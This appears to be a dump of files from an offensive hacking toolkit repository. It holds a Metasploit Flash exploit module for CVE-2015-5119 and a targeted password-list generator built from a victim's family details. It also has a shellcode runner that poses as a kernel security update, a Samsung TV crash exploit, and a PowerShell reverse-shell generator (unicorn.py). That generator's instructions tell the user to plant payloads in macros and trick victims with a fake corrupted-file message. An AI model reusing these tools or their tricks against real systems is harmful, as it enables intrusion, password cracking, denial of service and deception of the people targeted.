| 'Arch' => [ARCH_X86], 57 | 'BrowserRequirements' => 58 | { 59 | :source => /script|headers/i, 60 | :arch => ARCH_X86, 61 | :os_name => lambda do |os| 62 | os =~ OperatingSystems::Match::LINUX || 63 | os =~ OperatingSystems::Match::WINDOWS_7 || 64 | os =~ OperatingSystems::Match::WINDOWS_81 || 65 | os =~ OperatingSystems::Match::WINDOWS_VISTA || 66 | os =~ OperatingSystems::Match::WINDOWS_XP 67 | end, 68 | :ua_name => lambda do |ua| 69 | case target.name 70 | when 'Windows' 71 | return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF 72 | when 'Linux' 73 | return true if ua == Msf::HttpClients::FF 74 | end 75 | 76 | false 77 | end, 78 | :flash => lambda do |ver| 79 | case target.name 80 | when 'Windows' 81 | return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194') 82 | when 'Linux' 83 | return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468') 84 | end 85 | 86 | false 87 | end 88 | }, 89 
| 'Targets' => 90 | [ 91 | [ 'Windows', 92 | { 93 | 'Platform' => 'win' 94 | } 95 | ], 96 | [ 'Linux', 97 | { 98 | 'Platform' => 'linux' 99 | } 100 | ] 101 | ], 102 | 'Privileged' => false, 103 | 'DisclosureDate' => 'Jul 06 2015', 104 | 'DefaultTarget' => 0)) 105 | end 106 | 107 | def exploit 108 | @swf = create_swf 109 | 110 | super 111 | end 112 | 113 | def on_request_exploit(cli, request, target_info) 114 | print_status("Request: #{request.uri}") 115 | 116 | if request.uri =~ /\.swf$/ 117 | print_status('Sending SWF...') 118 | send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) 119 | return 120 | end 121 | 122 | print_status('Sending HTML...') 123 | send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) 124 | end 125 | 126 | def exploit_template(cli, target_info) 127 | swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" 128 | target_payload = get_payload(cli, target_info) 129 | b64_payload = Rex::Text.encode_base64(target_payload) 130 | 131 | if target.name =~ /Windows/ 132 | platform_id = 'win' 133 | elsif target.name =~ /Linux/ 134 | platform_id = 'linux' 135 | end 136 | 137 | html_template = %Q| 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | | 149 | 150 | return html_template, binding() 151 | end 152 | 153 | def create_swf 154 | path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf') 155 | swf = ::File.open(path, 'rb') { |f| swf = f.read } 156 | 157 | swf 158 | end 159 | end 160 | -------------------------------------------------------------------------------- /modules/changelog.nt: -------------------------------------------------------------------------------- 1 | ######################### 2 | # DONT CHANGE THIS FILE # 3 | ######################### 4 | 5 | 6 | Version :4.6 7 | Revission :30-nov-2015 8 | SSlstrip :0.9 9 | webcrawler :1.5 10 | priv8 :2.3 11 | last Video : 
http://www.youtube.com/watch?v=DUoBhqvtPnQ&list=PL6lei9H-Ej0KoXxkxWgNC6C30Sv8QaHUC 12 | 13 | 14 | By h4x0r :Apofis Kaizer [Debug on Mac OSx Systems] 15 | Developer :Fyodor [Nmap] 16 | Developer :ALoR & NaGa [Ettercap] 17 | Developer :HD moore [Metasploit] 18 | Developer :Moxie M [Sslstrip] 19 | Developer :Chris L [Driftnet] 20 | Developer :j0rgan [Cupp.py] 21 | Developer :ReL1K [unicorn.py] 22 | Developer :KyRecon [shellter] 23 | 24 | 25 | Web Page :http://www.backtracker.tk/ 26 | Web Page :http://www.r00tsect0r.net/ 27 | Web Page :https://www.facebook.com/Backtrack.Kali 28 | -------------------------------------------------------------------------------- /modules/cupp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #### 3 | # 4 | # [Program] 5 | # CUPP 1.0 6 | # Common User Passwords Profiler 7 | # 8 | # [Author] 9 | # Muris Kurgas aka j0rgan 10 | # jorganwd [at] gmail [dot] com 11 | # 12 | # 13 | # [License] 14 | # This program is free software; you can redistribute it and/or modify 15 | # it under the terms of the GNU General Public License as published by 16 | # the Free Software Foundation; either version 3 of the License, or 17 | # any later version. 18 | # 19 | # This program is distributed in the hope that it will be useful, 20 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 21 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 22 | # GNU General Public License for more details. 23 | # 24 | # You should have received a copy of the GNU General Public License 25 | # along with this program; if not, write to the Free Software 26 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 27 | # 28 | # See 'docs/LICENSE' for more information. 
29 | ### 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | # ----------------------------- 38 | # inport libs 39 | # ----------------------------- 40 | import sys 41 | import os 42 | 43 | 44 | 45 | 46 | 47 | # ----------------------------- 48 | # script colorize output 49 | # ----------------------------- 50 | BLUE = '\033[94m' 51 | RED = '\033[91m' 52 | GREEN = '\033[32m' 53 | WHITE = '\033[0m' 54 | ORANGE = '\033[33m' 55 | BUS = '\033[34m' 56 | 57 | 58 | 59 | 60 | # ---------------------------- 61 | # framework banner 62 | # --------------------------- 63 | 64 | print "" 65 | print RED+" ,__, " 66 | print RED+" (oo)____ " 67 | print RED+" (__) )\ " 68 | print RED+" ||--|| * " 69 | print BLUE+" 'Common User Password Profiler'" 70 | print BLUE+" [Author] Muris Kurgas aka j0rgan" 71 | print "" 72 | print "" 73 | print BUS+"[*] [input target info]:"+WHITE+" to make a dictionary [low cases!]" 74 | print ORANGE+"[*] If you don't know all the info, just hit enter when asked!\r\n" 75 | 76 | 77 | 78 | 79 | 80 | 81 | # -------------------------------- 82 | # start script functions 83 | # -------------------------------- 84 | print WHITE+"" 85 | name = raw_input("> Name: ") 86 | if len(name) == 0 or name == " " or name == " " or name == " ": 87 | print RED+"\r\n[x] You must enter a name at least!" 88 | print RED+"[X] Now exiting...\r\n" 89 | print WHITE+"" 90 | sys.exit() 91 | 92 | surname = raw_input("> Surname: ") 93 | nick = raw_input("> Nickname: ") 94 | birthdate = raw_input("> Birthdate (DDMMYYYY; i.e. 04111985): ") 95 | if len(birthdate) != 0: 96 | if len(birthdate) != 8: 97 | print RED+"\r\n[x] You must enter 8 digits for birthday!" 98 | print RED+"[x] Now exiting...\r\n" 99 | print WHITE+"" 100 | sys.exit() 101 | 102 | 103 | print "" 104 | wife = raw_input("> Wife's(husband's) name: ") 105 | wifen = raw_input("> Wife's(husband's) nickname: ") 106 | wifeb = raw_input("> Wife's(husband's) birthdate (DDMMYYYY; i.e. 
04111985): ") 107 | if len(wifeb) != 0: 108 | if len(wifeb) != 8: 109 | print RED+"\r\n[x] You must enter 8 digits for birthday!" 110 | print RED+"[x] Now exiting...\r\n" 111 | print WHITE+"" 112 | sys.exit() 113 | 114 | 115 | print "" 116 | kid = raw_input("> Child's name: ") 117 | kidn = raw_input("> Child's nickname: ") 118 | kidb = raw_input("> Child's birthdate (DDMMYYYY; i.e. 04111985): ") 119 | if len(kidb) != 0: 120 | if len(kidb) != 8: 121 | print RED+"\r\n[x] You must enter 8 digits for birthday!" 122 | print RED+"[X] Now exiting...\r\n" 123 | print WHITE+"" 124 | sys.exit() 125 | 126 | 127 | print "" 128 | pet = raw_input("> Pet's name: ") 129 | company = raw_input("> Company name: ") 130 | 131 | print "" 132 | words = [''] 133 | oth = raw_input("> Do you want to add some key words about the victim? [Y/N]: ") 134 | if oth == "y" or oth == "Y": 135 | words = raw_input("> Please enter the words, separated by comma. [i.e. hacker, juice, black]: ").split(", ") 136 | 137 | 138 | 139 | 140 | print BUS+"\r\n[*] [please wait]:"+WHITE+" making a dictionary..." 
141 | 142 | 143 | # ---------------------------------------- 144 | # Now me must do some string modifications 145 | # ---------------------------------------- 146 | birthdate_yy = birthdate[-2:] 147 | birthdate_yyy = birthdate[-3:] 148 | birthdate_yyyy = birthdate[-4:] 149 | birthdate_xd = birthdate[1:2] 150 | birthdate_xm = birthdate[3:4] 151 | birthdate_dd = birthdate[:2] 152 | birthdate_mm = birthdate[2:4] 153 | 154 | wifeb_yy = wifeb[-2:] 155 | wifeb_yyy = wifeb[-3:] 156 | wifeb_yyyy = wifeb[-4:] 157 | wifeb_xd = wifeb[1:2] 158 | wifeb_xm = wifeb[3:4] 159 | wifeb_dd = wifeb[:2] 160 | wifeb_mm = wifeb[2:4] 161 | 162 | kidb_yy = kidb[-2:] 163 | kidb_yyy = kidb[-3:] 164 | kidb_yyyy = kidb[-4:] 165 | kidb_xd = kidb[1:2] 166 | kidb_xm = kidb[3:4] 167 | kidb_dd = kidb[:2] 168 | kidb_mm = kidb[2:4] 169 | 170 | # ---------------------------------- 171 | # Convert first letters to uppercase 172 | # ---------------------------------- 173 | nameup = name.title() 174 | surnameup = surname.title() 175 | nickup = nick.title() 176 | wifeup = wife.title() 177 | wifenup = wifen.title() 178 | kidup = kid.title() 179 | kidnup = kidn.title() 180 | petup = pet.title() 181 | companyup = company.title() 182 | wordsup = [] 183 | for words1 in words: 184 | wordsup.append(words1.title()) 185 | 186 | word = words+wordsup 187 | 188 | # ------------------------------ 189 | # reverse a name 190 | # ----------------------------- 191 | rev_name = name[::-1] 192 | rev_nameup = nameup[::-1] 193 | rev_nick = nick[::-1] 194 | rev_nickup = nickup[::-1] 195 | rev_wife = wife[::-1] 196 | rev_wifeup = wifeup[::-1] 197 | rev_kid = kid[::-1] 198 | rev_kidup = kidup[::-1] 199 | 200 | reverse = [rev_name, rev_nameup, rev_nick, rev_nickup, rev_wife, rev_wifeup, rev_kid, rev_kidup] 201 | rev_n = [rev_name, rev_nameup, rev_nick, rev_nickup] 202 | rev_w = [rev_wife, rev_wifeup] 203 | rev_k = [rev_kid, rev_kidup] 204 | 205 | # -------------------------------- 206 | # Let's do some serious work! 
This will be a mess of code, but... who cares? :) 207 | # -------------------------------- 208 | bds = [birthdate_yy, birthdate_yyy, birthdate_yyyy, birthdate_xd, birthdate_xm, birthdate_dd, birthdate_mm] 209 | 210 | bdss = [] 211 | 212 | for bds1 in bds: 213 | bdss.append(bds1) 214 | for bds2 in bds: 215 | if bds.index(bds1) != bds.index(bds2): 216 | bdss.append(bds1+bds2) 217 | for bds3 in bds: 218 | if bds.index(bds1) != bds.index(bds2) and bds.index(bds2) != bds.index(bds3) and bds.index(bds1) != bds.index(bds3): 219 | bdss.append(bds1+bds2+bds3) 220 | 221 | 222 | 223 | # --------------------------------- 224 | # For a woman 225 | # --------------------------------- 226 | wbds = [wifeb_yy, wifeb_yyy, wifeb_yyyy, wifeb_xd, wifeb_xm, wifeb_dd, wifeb_mm] 227 | 228 | wbdss = [] 229 | 230 | for wbds1 in wbds: 231 | wbdss.append(wbds1) 232 | for wbds2 in wbds: 233 | if wbds.index(wbds1) != wbds.index(wbds2): 234 | wbdss.append(wbds1+wbds2) 235 | for wbds3 in wbds: 236 | if wbds.index(wbds1) != wbds.index(wbds2) and wbds.index(wbds2) != wbds.index(wbds3) and wbds.index(wbds1) != wbds.index(wbds3): 237 | wbdss.append(wbds1+wbds2+wbds3) 238 | 239 | 240 | 241 | # --------------------------------- 242 | # and a child 243 | # --------------------------------- 244 | kbds = [kidb_yy, kidb_yyy, kidb_yyyy, kidb_xd, kidb_xm, kidb_dd, kidb_mm] 245 | 246 | kbdss = [] 247 | 248 | for kbds1 in kbds: 249 | kbdss.append(kbds1) 250 | for kbds2 in kbds: 251 | if kbds.index(kbds1) != kbds.index(kbds2): 252 | kbdss.append(kbds1+kbds2) 253 | for kbds3 in kbds: 254 | if kbds.index(kbds1) != kbds.index(kbds2) and kbds.index(kbds2) != kbds.index(kbds3) and kbds.index(kbds1) != kbds.index(kbds3): 255 | kbdss.append(kbds1+kbds2+kbds3) 256 | 257 | 258 | # --------------------------------- 259 | # string combinations 260 | # --------------------------------- 261 | kombinaac = [pet, petup, company, companyup] 262 | 263 | kombina = [name, surname, nick, nameup, surnameup, nickup] 264 | 265 | 
kombinaw = [wife, wifen, wifeup, wifenup, surname, surnameup] 266 | 267 | kombinak = [kid, kidn, kidup, kidnup, surname, surnameup] 268 | 269 | kombinaa = [] 270 | for kombina1 in kombina: 271 | kombinaa.append(kombina1) 272 | for kombina2 in kombina: 273 | if kombina.index(kombina1) != kombina.index(kombina2) and kombina.index(kombina1.title()) != kombina.index(kombina2.title()): 274 | kombinaa.append(kombina1+kombina2) 275 | 276 | kombinaaw = [] 277 | for kombina1 in kombinaw: 278 | kombinaaw.append(kombina1) 279 | for kombina2 in kombinaw: 280 | if kombinaw.index(kombina1) != kombinaw.index(kombina2) and kombinaw.index(kombina1.title()) != kombinaw.index(kombina2.title()): 281 | kombinaaw.append(kombina1+kombina2) 282 | 283 | kombinaak = [] 284 | for kombina1 in kombinak: 285 | kombinaak.append(kombina1) 286 | for kombina2 in kombinak: 287 | if kombinak.index(kombina1) != kombinak.index(kombina2) and kombinak.index(kombina1.title()) != kombinak.index(kombina2.title()): 288 | kombinaak.append(kombina1+kombina2) 289 | 290 | 291 | 292 | # inserting some years, you can add more if you want... 
# Year suffixes 2000-2010, appended to every stem in the komb4-7, komb11 and
# komb17-18 products below.
years = list(map(str, range(2000, 2011)))


def concats(seq, start, stop):
    """Yield each string of `seq` followed by every integer in [start, stop).

    The integer range is rebuilt for each stem and `stop` itself is excluded.
    """
    for stem in seq:
        for number in xrange(start, stop):
            yield stem + str(number)


def komb(seq, start):
    """Yield `a + b` for every `a` in `seq` and every `b` in `start`.

    Despite its name, `start` is the collection of suffixes. It is walked once
    per stem, so it has to be re-iterable (every caller below passes a list).
    """
    for stem in seq:
        for suffix in start:
            yield stem + suffix


# Candidate space = stems x (date fragments | years | 0-999). Any password made
# of a personal word followed by a date fragment or a short number falls inside
# this space, which is what makes that pattern predictable.

# name / partner / child stems combined with the matching birthdate fragments
komb1 = list(komb(kombinaa, bdss))
komb2 = list(komb(kombinaaw, wbdss))
komb3 = list(komb(kombinaak, kbdss))

# the same stems (plus pet / company) combined with the fixed year list
komb4 = list(komb(kombinaa, years))
komb5 = list(komb(kombinaac, years))
komb6 = list(komb(kombinaaw, years))
komb7 = list(komb(kombinaak, years))

# free-form keywords combined with every date list and with the years
komb8 = list(komb(word, bdss))
komb9 = list(komb(word, wbdss))
komb10 = list(komb(word, kbdss))
komb11 = list(komb(word, years))

# numeric suffixes 0-999 (the upper bound 1000 is excluded by xrange)
komb12 = list(concats(word, 0, 1000))
komb13 = list(concats(kombinaa, 0, 1000))
komb14 = list(concats(kombinaac, 0, 1000))
komb15 = list(concats(kombinaaw, 0, 1000))
komb16 = list(concats(kombinaak, 0, 1000))

# reversed spellings get the same year / date / number treatment
komb17 = list(komb(reverse, years))
komb18 = list(komb(rev_w, years))
komb19 = list(komb(rev_k, kbdss))
komb20 = list(komb(rev_n, bdss))
komb21 = list(concats(reverse, 0, 1000))

print BUS+"[*]"+WHITE+" Sorting list and removing duplicates..."
# Collapse every candidate list to its distinct strings. dict.fromkeys() keeps
# one key per distinct value; nothing in this step sorts, so the resulting order
# is whatever the dict yields.
komb_unique1 = list(dict.fromkeys(komb1))
komb_unique2 = list(dict.fromkeys(komb2))
komb_unique3 = list(dict.fromkeys(komb3))
komb_unique4 = list(dict.fromkeys(komb4))
komb_unique5 = list(dict.fromkeys(komb5))
komb_unique6 = list(dict.fromkeys(komb6))
komb_unique7 = list(dict.fromkeys(komb7))
komb_unique8 = list(dict.fromkeys(komb8))
komb_unique9 = list(dict.fromkeys(komb9))
komb_unique10 = list(dict.fromkeys(komb10))
komb_unique11 = list(dict.fromkeys(komb11))
komb_unique12 = list(dict.fromkeys(komb12))
komb_unique13 = list(dict.fromkeys(komb13))
komb_unique14 = list(dict.fromkeys(komb14))
komb_unique15 = list(dict.fromkeys(komb15))
komb_unique16 = list(dict.fromkeys(komb16))
komb_unique17 = list(dict.fromkeys(komb17))
komb_unique18 = list(dict.fromkeys(komb18))
komb_unique19 = list(dict.fromkeys(komb19))
komb_unique20 = list(dict.fromkeys(komb20))
komb_unique21 = list(dict.fromkeys(komb21))
komb_unique01 = list(dict.fromkeys(kombinaa))
komb_unique02 = list(dict.fromkeys(kombinaac))
komb_unique03 = list(dict.fromkeys(kombinaaw))
komb_unique04 = list(dict.fromkeys(kombinaak))
komb_unique05 = list(dict.fromkeys(word))

# Concatenate in the original order: raw date fragments and reversed names
# first, then the bare stems, then every combined list.
uniqlist = []
for part in (
    bdss, wbdss, kbdss, reverse,
    komb_unique01, komb_unique02, komb_unique03, komb_unique04, komb_unique05,
    komb_unique1, komb_unique2, komb_unique3, komb_unique4, komb_unique5,
    komb_unique6, komb_unique7, komb_unique8, komb_unique9, komb_unique10,
    komb_unique11, komb_unique12, komb_unique13, komb_unique14, komb_unique15,
    komb_unique16, komb_unique17, komb_unique18, komb_unique19, komb_unique20,
    komb_unique21,
):
    uniqlist.extend(part)

# Final de-duplication across all lists.
unique_list = list(dict.fromkeys(uniqlist))

# The output path is `name` + '.txt', relative to the current working directory.
# `name` is used as given, so it decides where the file lands.
wordlist_path = name + '.txt'
with open(wordlist_path, 'w') as f:
    f.write(os.linesep.join(unique_list))

# Re-read the file to count its lines. The handle is left open on purpose:
# the script closes `fcount` in the statement that follows this block.
fcount = open(wordlist_path, 'r')
lines = sum(1 for _ in fcount)
376 | 377 | fcount.close() 378 | 379 | print BUS+"[*]"+WHITE+" Saving dictionary to "+GREEN+"[opensource/logs/"+name+".txt]"+WHITE+", counting "+GREEN+"["+str(lines)+"]"+WHITE+" words." 380 | print BUS+"[*]"+WHITE+" Now load your pistolero with "+GREEN+"["+name+".txt]"+WHITE+" and shoot! Good luck!" 381 | print WHITE+"" 382 | print WHITE+"" 383 | 384 | # --------------------------- 385 | # end of file 386 | # --------------------------- 387 | -------------------------------------------------------------------------------- /modules/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/modules/database.db -------------------------------------------------------------------------------- /modules/exec.c: -------------------------------------------------------------------------------- 1 | //C-INJECTOR by: [ r00t-3xp10it ] inject shellcode into 2 | //one 'C' function (exec.c) to make it executable, paste your 3 | //shellcode in 'C' format just bellow 'unsigned char buf[] =' 4 | //replacing the existing shellcode by our own... 
5 | 6 | 7 | #include 8 | #include 9 | 10 | 11 | unsigned char buf[] = 12 | "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" 13 | "\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; 14 | 15 | 16 | 17 | main() 18 | { 19 | 20 | printf("\nPlease Wait, updating system...\nPatching kernel with latest security updates.\nShellcode Length: %d", strlen(buf)); 21 | 22 | int (*ret)() = (int(*)())buf; 23 | 24 | ret(); 25 | } 26 | 27 | -------------------------------------------------------------------------------- /modules/msf.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/modules/msf.swf -------------------------------------------------------------------------------- /modules/samsung_reset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Exploit Title: Samsung TV Denial of Service (DoS) Attack 4 | # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com 5 | # Rec0ded by: pedr0 ubuntu aka r00t-3xp10it 6 | # 7 | # Date: 07/21/2013 8 | # CVE Number: CVE-2013-4890 9 | # Vendor Homepage: http://www.samsung.com 10 | # 11 | # Description: 12 | # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long 13 | # HTTP GET request As a results, the TV reboots... 
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###

# ----------------------------
# dependencies (time is listed twice in the original; kept as-is)
# ----------------------------
import httplib
import time
import sys
import os
import time

# ----------------------------
# ANSI colour codes for terminal output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'

# ----------------------------
# banner: printed line by line, in order
# ----------------------------
for banner_line in (
    BLUE+"**************************************************************",
    WHITE+" Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com",
    WHITE+" Exploit: Denial of Service (DoS) attack",
    WHITE+" Rec0ded by: pedr0 ubuntu aka r00t-3xp10it",
    "",
    WHITE+" Description:",
    WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600",
    WHITE+" is crashing by sending a long HTTP GET request.",
    WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)",
    BLUE+"**************************************************************",
):
    print banner_line

# ----------------------------
# single request to the host given as the first command-line argument
# ----------------------------
# What goes on the wire: one HTTP GET to TCP/5600 whose request target is 300
# 'A' characters with no leading '/'. That over-long, malformed request line is
# the observable to match when monitoring for this issue. Keeping TCP/5600
# unreachable from untrusted networks removes the exposure.
print ""
print BLUE+"[*]"+GREEN+" press ctrl+z to stop"
print BLUE+"[*]"+WHITE+" Sending the malicious payload..."
target_host = sys.argv[1]
conn = httplib.HTTPConnection(target_host, 5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# status check (the polling loop itself follows this block)
# ----------------------------
print BLUE+"[*]"+WHITE+" Checking the status..."
73 | response = 0 74 | while response == 0: 75 | response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") 76 | if response != 0: 77 | print BLUE+"[*]"+GREEN+" (Success):"+RED+" the target seems to be down !!!" 78 | print WHITE+"" 79 | time.sleep(10) 80 | 81 | 82 | -------------------------------------------------------------------------------- /modules/unicorn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Magic Unicorn - PowerShell downgrade attack and exploitation tool 4 | # 5 | # Written by: Dave Kennedy (@HackingDave) 6 | # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com 7 | # 8 | # Real quick down and dirty for native x86 powershell on any platform 9 | # 10 | # Usage: python unicorn.py payload reverse_ipaddr port 11 | # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 12 | # Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro 13 | # HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta 14 | # 15 | # Requirements: Need to have Metasploit installed. 16 | # 17 | # Special thanks to Matthew Graeber and Josh Kelley 18 | # 19 | import base64 20 | import re 21 | import subprocess 22 | import sys 23 | import os 24 | import shutil 25 | 26 | 27 | class ColorsEnum: 28 | CYAN = '\033[96m' 29 | BLUE = '\033[94m' 30 | RED = '\033[91m' 31 | BOLD = '\033[1m' 32 | ENDC = '\033[0m' 33 | 34 | 35 | # display unicorn banner 36 | def gen_unicorn(): 37 | print r""" 38 | ,/ 39 | // 40 | ,// 41 | ___ /| |// 42 | `__/\_ --(/|___/-/ 43 | \|\_-\___ __-_`- /-/ \. 44 | |\_-___,-\_____--/_)' ) \ 45 | \ -_ / __ \( `( __`\| 46 | `\__| |""" + ColorsEnum.RED + r"""\)\ """ + ColorsEnum.ENDC + r""") """ + ColorsEnum.RED + r"""/(/""" + ColorsEnum.ENDC + r"""| 47 | ,._____., ',--//-| \ | ' / 48 | / __. \, / /,---| \ / 49 | / / _. 
\ \ `/`_/ _,' | | 50 | | | ( ( \ | ,/\'__/'/ | | 51 | | \ \`--, `_/_------______/ \( )/ 52 | | | \ \_. \, \___/\ 53 | | | \_ \ \ \ 54 | \ \ \_ \ \ / \ 55 | \ \ \._ \__ \_| | \ 56 | \ \___ \ \ | \ 57 | \__ \__ \ \_ | \ | 58 | | \_____ \ ____ | | 59 | | \ \__ ---' .__\ | | | 60 | \ \__ --- / ) | \ / 61 | \ \____/ / ()( \ `---_ /| 62 | \__________/(,--__ \_________. | ./ | 63 | | \ \ `---_\--, \ \_,./ | 64 | | \ \_ ` \ /`---_______-\ \\ / 65 | \ \.___,`| / \ \\ \ 66 | \ | \_ \| \ ( |: | 67 | \ \ \ | / / | ; 68 | \ \ \ \ ( `_' \ | 69 | \. \ \. \ `__/ | | 70 | \ \ \. \ | | 71 | \ \ \ \ ( ) 72 | \ | \ | | | 73 | | \ \ \ I ` 74 | ( __; ( _; ('-_'; 75 | |___\ \___: \___: 76 | """ 77 | 78 | 79 | # display macro help 80 | def macro_help(): 81 | print """ 82 | [*******************************************************************************************************] 83 | 84 | -----MACRO ATTACK INSTRUCTIONS---- 85 | 86 | For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do 87 | that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code 88 | into that. This will automatically run. Note that a message will prompt to the user saying that the file 89 | is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the 90 | victim to thinking the excel document is corrupted. You should get a shell through powershell injection 91 | after that. 92 | 93 | NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO 94 | REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL 95 | HAPPEN! 
96 | 97 | [*******************************************************************************************************] 98 | 99 | """ 100 | 101 | 102 | # display hta help 103 | def hta_help(): 104 | print """ 105 | [*******************************************************************************************************] 106 | 107 | -----HTA ATTACK INSTRUCTIONS---- 108 | 109 | The HTA attack will automatically generate two files, the first the index.html which tells the browser to 110 | use Launcher.hta which contains the malicious powershell injection code. All files are exported to the 111 | hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the 112 | last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit. 113 | 114 | A user must click allow and accept when using the HTA attack in order for the powershell injection to work 115 | properly. 116 | 117 | [*******************************************************************************************************] 118 | 119 | """ 120 | 121 | 122 | # display powershell help 123 | def ps_help(): 124 | print """ 125 | [********************************************************************************************************] 126 | 127 | -----POWERSHELL ATTACK INSTRUCTIONS---- 128 | 129 | Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all 130 | of the code needed in order to inject the powershell attack into memory. Note you will need a place that 131 | supports remote command injection of some sort. Often times this could be through an excel/word doc or 132 | through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to 133 | where you can use this attack at. 
Simply paste the powershell_attacks.txt command in any command prompt 134 | window or where you have the ability to call the powershell executable and it will give a shell back to 135 | you. 136 | 137 | Note that you will need to have a listener enabled in order to capture the attack. 138 | 139 | [*******************************************************************************************************] 140 | """ 141 | 142 | 143 | # display cert help 144 | def cert_help(): 145 | print """ 146 | [*******************************************************************************************************] 147 | 148 | -----CERUTIL Attack Instruction---- 149 | 150 | The certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take 151 | a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to 152 | a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim 153 | machine through a fake certificate file. To use this attack, simply place an executable in the path of 154 | unicorn and run python unicorn.py crt in order to get the base64 output. Once that's finished, 155 | go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a 156 | windows machine to convert it back to a binary. 157 | 158 | [*******************************************************************************************************] 159 | """ 160 | 161 | 162 | def custom_ps1_help(): 163 | print """ 164 | [*******************************************************************************************************] 165 | 166 | -----Custom PS1 Attack Instructions---- 167 | 168 | This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro. 169 | 170 | Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by 171 | VBA. 
You may change the number of characters in each VBA string by passing an integer as a parameter. 172 | 173 | Examples: 174 | 175 | python unicorn.py harmless.ps1 176 | python unicorn.py myfile.ps1 macro 177 | python unicorn.py muahahaha.ps1 macro 500 178 | 179 | The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA. 180 | 181 | [*******************************************************************************************************] 182 | """ 183 | 184 | 185 | # usage banner 186 | def gen_usage(): 187 | print "-------------------- Magic Unicorn Attack Vector v2.1.2-----------------------------" 188 | print "\nNative x86 powershell injection attacks on any Windows platform." 189 | print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)" 190 | print "Twitter: @TrustedSec, @HackingDave" 191 | print "Credits: Matthew Graeber, Justin Elze, Chris Gates" 192 | print "\nHappy Magic Unicorns." 193 | print "" 194 | print "Usage: python unicorn.py payload reverse_ipaddr port " 195 | print "PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443" 196 | print "Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro" 197 | print "HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta" 198 | print "CRT Example: python unicorn.py crt" 199 | print "Custom PS1 Example: python unicorn.py " 200 | print "Custom PS1 Example: python unicorn.py macro 500" 201 | print "Help Menu: python unicorn.py --help\n" 202 | 203 | 204 | # split string 205 | def split_str(s, length): 206 | return [s[i:i + length] for i in range(0, len(s), length)] 207 | 208 | 209 | # write a file to designated path 210 | def write_file(path, text): 211 | file_write = file(path, "w") 212 | file_write.write(text) 213 | file_write.close() 214 | 215 | 216 | # generate full macro 217 | def generate_macro(full_attack, line_length=380): 218 | # start of the macro 219 | 
